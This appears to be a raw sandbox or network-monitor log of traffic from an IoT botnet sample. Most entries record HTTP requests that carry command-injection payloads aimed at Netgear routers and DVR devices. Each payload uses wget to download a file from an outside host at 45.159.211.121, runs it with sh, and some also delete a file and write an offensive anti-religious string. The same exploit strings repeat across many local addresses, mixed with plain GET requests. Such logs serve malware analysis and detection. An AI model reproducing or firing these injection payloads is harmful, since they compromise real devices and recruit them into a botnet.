Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.7Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.9Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.225.35.210Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.59Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.123Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.119Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.124Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.183Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.187Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.198Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.215Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
